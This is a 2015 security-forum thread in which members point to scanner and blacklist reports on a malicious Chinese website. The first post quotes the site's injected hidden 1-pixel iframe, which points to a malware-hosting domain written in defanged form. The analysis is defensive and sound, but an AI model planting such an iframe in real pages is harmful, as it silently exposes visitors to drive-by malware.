Author Topic: Malware url?  (Read 2243 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34048
  • malware fighter
Malware url?
« on: August 20, 2015, 09:45:27 PM »
See: http://urlquery.net/report.php?id=1440099101732  &  http://toolbar.netcraft.com/site_report?url=htyzs.cn%2F
website risk status 7 red out of 10.
Blacklisted and with hidden iFrame: http://killmalware.com/htyzs.cn/  line 325 in the code: http://1col.ru/www.htyzs.cn
idden Iframes. Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202?v04
<iframe style="height:1px" src="-http://www&#46;Brenz.pl/rc/" frameborder=0 width=1>
System Details:
Running on: Microsoft-IIS/7.5
Powered by: UrlRewriter.NET -> https://asafaweb.com/Scan?Url=htyzs.cn  Custom-errors:Fail and two warnings.
external link flagged by WOT: https://www.mywot.com/en/scorecard/cnbocainews.com.cutestat.com?utm_source=addon&utm_content=popup
Consider: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fhtyzs.cn
Furthermore: uMatrix has prevented the following page from loading:
-http://js.users.51.la/15502089.js

polonus
« Last Edit: August 20, 2015, 09:47:15 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

REDACTED

  • Guest
« Last Edit: August 20, 2015, 10:43:04 PM by Dim@rik »

Offline Para-Noid

  • Avast Evangelist
  • Starting Graphoman
  • ***
  • Posts: 6699
  • Trust only what you test yourself!
Re: Malware url?
« Reply #2 on: August 20, 2015, 10:42:51 PM »
And...

IP Blacklisted http://multirbl.valli.org/lookup/124.232.147.8.html (lots of "fails" too)
drweb.com  http://online.us.drweb.com/result/?url=http://htyzs.cn/
http://dnscheck.pingdom.com/?domain=htyzs.cn&timestamp=1440102887&view=1
http://www.dnsinspect.com/htyzs.cn/1440102922

ragepank.com shows redirect issues for htyzs(dot)cn

@ polonus  Thanks for using netcraft.com It makes a great starting point to search for website issues.

edit: additional
« Last Edit: August 20, 2015, 10:44:46 PM by Para-Noid »
Dell Inspiron, Win10x64--HP Envy Win10x64--Both systems Avast Free v17.9.2322, Comodo Firewall v8.2 w/D+, MalwareBytes v3.0, OpenDNS, Super Anti-Spyware, Spyware Blaster, MCShield, Unchecky, Vivaldi Browser and, various browser security tools.

"Look before you leap!" Use online scanners before you click on any link.